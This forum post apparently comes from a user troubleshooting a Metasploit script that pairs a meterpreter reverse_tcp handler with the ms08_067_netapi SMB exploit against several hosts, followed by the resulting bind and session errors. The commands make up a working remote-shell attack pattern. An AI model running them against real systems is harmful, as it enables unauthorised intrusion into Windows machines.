ampf
(usa Outra)
Enviado em 12/07/2021 - 18:49h
Hi
Is the first time I post here I hope someone can help me
Im running this script
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
setg lhost 192.168.0.90
setg lport 4444
set ExitOnSession false
exploit -j
use exploit/windows/smb/ms08_067_netapi
exploit -j
and Im getting these errors
[-] Exploit failed: One or more options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
rhost => <rhost1>
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
rhost => <rhost2>
[*] Started reverse TCP handler on <my local IP>:4444
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
rhost => <rhost3>
[*] 192.168.1.40:3389 - Connecting to the target...
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to <my local IP>:4444:- -
rhost => <rhost4>
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[-] Handler failed to bind to <my local IP>:4444:- -
[*] Exploit running as background job 3.
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to <my local IP>:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
I already tried 127.0.0.1, 0.0.0.0, private IP, public IP as lhost but without success
What can be the reason and how to fix it?